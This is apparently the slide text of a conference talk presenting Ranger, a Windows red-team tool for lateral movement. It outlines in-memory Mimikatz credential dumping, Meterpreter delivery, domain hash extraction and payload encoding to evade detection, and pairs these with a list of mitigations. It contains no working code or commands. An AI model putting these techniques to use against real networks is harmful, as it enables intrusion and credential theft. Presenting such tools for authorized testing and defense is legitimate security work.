RANGERIT JUST TAKES ONE ACCOUNT

TO TAKE DOWN AN ENTERPRISE!

WHO ARE WE?

• Chris “Funk and Wagnalls” Duffy

• Code Cobbler

• Dev “Leeroy” Patel

• Code Lobber

• Jonathan “Wushu” Fallone

• Code Janitor

DISCLAIMER

• Ranger is provided only as a security tool to be performed during legal and authorized assessments

• Do not do anything illegal with Ranger, if you do you will probably have bad things happen to you, we are not involved

• We do not represent any organizations including our current employer

• Our opinion’s are our own

THANK YOU

• Microsoft for PowerShell (and in advance for bash in Windows!)

• To the CoreLabs Impacket Team

• PowerShellEmpire Team

• Mattifestation for starting PowerSploit and PowerShellMafia and contributors for continuing to develop it

• To our friends who told us where our tool sucked (constructive feedback is important!)

THE OLD WAYS…AND THE ISSUES

• Lots of different command syntax to remember

• Depending on special characters the tool would break

• Bad hash formats would not be recognized

• Many different terminals make it hard to remember what is doing what

• Ctrl+C was not your friend (oops wrong terminal or killed my Framework instance)

• You could not pass commands through pipes cleanly

• Painful and easy to be detected on large enterprise-class networks

• Very slow takes forever to assess all targets

THERE MUST BE A BETTER WAY… AND

NOW THERE IS!

RANGER

A Windows Attack Tool That Automates Access and Exploitation of Targets Quickly and Stealthy – You only need credentials, Python, and sometimes PowerShell * We did not make this image we borrowed

it from the CyberPunk website, they made it for this tool

SO BACK IN JULY, 2015…• We wanted a tool that could bypass IDS/IPS being implemented in

big organizations

• We wanted to determine gaps in monitoring coverage

• We knew the limitations in current methods and implementations

• We were tired of grep/sed/awk – ing everything and piping results, but we wanted to be able to if we wanted to (ala NO FRAMEWORKS!)

• We did not want Ctrl+C destroying our world when something went wrong

• We wanted to be able to pass information between sessions or multi-person assessment teams

• We wanted to be able to inject any script or binary into memory we wanted

• We wanted to be lazier, so we could focus on more fun and challenging tasks (dumping creds is not hard)

• We wanted to link it all together with native Python (because we hate, loath, and mandate the destruction of gems and gem conflicts!)

WHAT IS RANGER GOOD FOR?

• Hitting multiple systems with PowerShell exploits like Mimikatz very quickly

• Identifying where an account has access and who has a current session

• Executing custom code against a box without dropping a payload on the box

• Avoiding protective tools that key on White Listing, Process Monitoring, and Signature Detection Techniques

• Automatic logging of results

• Scalability for enormous networks

* Because Swiss Army Knives Suck

Vision: To be able to automate the tedious high error rate tasks in masse

RANGER USERS “METHODS” TO DELIVER “ATTACKS,” PRIMARILY THROUGH A BUILT-IN HTTP “CATAPULT” SERVER, WHICH DELIVER

THE PAYLOADS

METHODS

• A ton of custom code and modified Impacket tools

• WMIEXEC

• SMBEXEC

• PSEXEC

• ATEXEC

*BTW these methods have had more success than this guy

ATTACKS

• SCOUT - determines access and identifies logged in users where credentials may reside extracted (Counts as a Method and Attack)

• Basic command shell (PSEXEC and SMBEXEC)

• Send arbitrary commands (i.e. net user) through WMIEXEC, PSEXEC, and ATEXEC

• INVOKER – execute a Mimikatz PowerShell script in memory (DumpCreds by default)

• DOWNLOADER – Download and execute a Metasploit Meterpreter via web_delivery (Yes, you need Metasploit for this Attack)

• EXECUTOR – use WMIEXEC or ATEXEC to execute any PowerShell Script or binary through PowerShell

• SECRETS-DUMP – dump the local hashes or the full domain controller (Counts as a Method and Attack)

• Create encoded PowerShell scripts that can be catapulted or copied and pasted into a prompt

STEALTH

• Payloads are double encoded by default! (use --no-encode to stop that)

• Scout uses DCE/RPC and requires four different logs correlated with specific timestamps to detect it

• Invoker, Downloader, and Executor use direct memory injection so nothing touches disk

AUTOMATION• Can take a range or CIDR of addresses as input

• Can take a list of IP addresses in a file

• Can take Nmap XMLs as input

• Can do all at the same time

• Accepts comma separation listed of each

• Aggregates results and eliminates duplicates

• Includes an allowance for exclusions, exclusions lists, and exclusion Nmap XMLs

• Automatically ignores your IP address – why? Because in makes sense, it is 2016 for crying out loud (take that Metasploit!)

• It accepts multiple hash formats from PWDUMP to LM:NTLM formats and broken hashes (yes ranger attempts to fix them)

OUTPUT

• Saves detailed logs for troubleshooting

• Stores results in multiple files and folders

• Aggregates the details across multiple sessions

• Has a master credential matrix file that acts as a flat database and can be transitioned between Ranger instances and/or sessions

• Automatically saves credentials obtained via Mimikatz, SECRETS-DUMP, and other tools

• You can purge all the details between clients if you want (ranger --purge)

INSTALLATION

One easy setup file that creates the needed log folders, retrieves modified PowerTools and PowerSploit scripts, downloads and installs Impacket, and loads the Ranger Python script and necessary libraries (yes we are that lazy too!)

• Step 1: Download setup.sh script from GitHub

• Step 2: chown the script so it can run (i.e. a+x)

• Step 3: Run setup.sh script

• Step 4: Relax and have a beer

• You can also update easily (ranger --update)

MITIGATIONS• Prevent lateral movement with local accounts

• Deny access to this computer from the network – local groups and administrators

• Implement Microsoft Local Administrator Password Solution (LAPS)

• Principle of least privileged access – duh!

• Restrict Windows Management Instrumentation Command-line (WMIC)

• Restrict PowerShell with AppLocker

• Domain Admin accounts = Domain Controllers only

• Logs Logs Logs

• Centralize those event logs

• PowerShell 5.0 – Script block logging – Windows 7 / 2008 R2 +

• Trend analysis and PowerShell Remoting usage

• READ!!!!

• The two white papers by Microsoft for Pass-the-Hash Mitigation (YES we know it does not mitigate Pass-the-Hash, but it does show some good credential hygiene practices)

• Read the NSA White Paper on Detecting Pass-the-Hash (Read above bullet, same applies here)

THE FUTURE

• WINDOWER – Execute PowerShell without hiding the window to avoid certain monitoring systems…and take advantage of human gullibility

• GATHERER – Automated credential extractor for a domain group

• HUNTER - Semi-Intelligent Decision (SID) – Identifies an escalation path based on group membership similarities to go from standard access to a target group, by building a decision tree (technically a classification tree)

• Better NTDS and Group Parsing for all those Windows OSs that are all the same

• SMB Catapult servers

• Are we currently coding these? YES! And we are hoping for another Security Conference to accept our CFP to show the new features!

DEMO TIME!BRING THE PWNAGE!

CHEERS TO YOU…